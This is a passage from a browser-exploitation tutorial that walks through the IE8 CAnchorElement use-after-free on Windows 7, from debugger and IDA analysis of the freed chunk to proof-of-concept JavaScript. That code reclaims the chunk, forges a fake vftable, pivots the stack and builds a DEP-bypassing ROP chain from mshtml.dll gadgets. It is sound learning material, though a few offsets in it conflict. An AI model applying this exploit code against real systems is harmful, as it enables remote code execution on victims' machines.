Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!

#

This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 “fake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th “function” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx       ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
ss
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, and will be the last process listed in WinDbg under “System order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on “jump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

